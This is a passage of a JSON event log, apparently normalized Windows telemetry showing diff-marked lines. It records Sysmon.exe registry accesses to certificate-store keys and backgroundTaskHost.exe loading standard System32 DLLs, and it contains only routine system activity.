131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "slc.dll", - "image_path": "C:\\Windows\\System32\\slc.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskExecutionCountSinceLastReset", - "registry_value": "TaskExecutionCountSinceLastReset", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cdp.dll", - "image_path": "C:\\Windows\\System32\\cdp.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": 